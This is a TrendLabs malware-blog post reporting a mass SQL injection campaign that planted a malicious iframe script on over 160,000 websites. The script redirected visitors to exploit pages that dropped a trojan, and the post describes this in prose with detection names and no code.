Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    September 2015
    S M T W T F S
    « Aug    
  • Email Subscription

  • About Us

    Barely recovering from the flurry of analysis surrounding the weekend compromise, Trend Micro researchers from Taiwan have yet again discovered a new attack.

    The nature of affected sites seem to be quite diverse, although a big chunk belongs to the Asia Pacific region. Hackers have apparently conducted another massive SQL injection attack, causing well over 160,000 Web sites to contain a certain malicious script.

    Figure 1. Trend Micro product in action, blocking access to sites containing this script.

    Trend Micro detects the script as HTML_IFRAME.NG. When unsuspecting users visit one of these infected pages, they are redirected to any of three URLs containing various exploits. The scripts found in these URLs are detected by Trend Micro as the following:

    JS_DLOADER.JYT, in turn, exploits the MS Data Access Components (MDAC) vulnerability (as described in Microsoft Security Bulletin MS06-014).

    JS_REALPLR.CB, JS_REALPLR.CD and JS_DLOADER.JYT all access a URL in the same domain which downloads 1.exe onto the infected PC. Trend Micro detects 1.exe as TSPY_LINEAGE.PJ (update: the file is now TROJ_AGENT.WPA as of this writing).

    The attack algorithm is illustrated below:

    {attack infection diagram}

    Figure 2. Attack algorithm

    Users are bound to be infected by the aforementioned malware should their browsers allow automatic execution of ActiveX controls. Since users are viewing legitimate sites, it is highly likely that even when browsers are configured to prompt for ActiveX or script download, users will still agree to download the offered file.

    Only a strong Web Threat Protection suite breaks the the infection chain at various points of the attack. This becomes incredibly important considering that the final payload, 1.exe, appears to change with every download. If the user is prevented from accessing URLs which the initial script redirects to in the first place, then the user is effectively protected from whatever threat the final payload may bring.

    Note: Our regional partners are now trying to reach the appropriate CERTs of the affected sites. We have also blocked all related malicious domains and detected all malicious files.

    Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.

    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice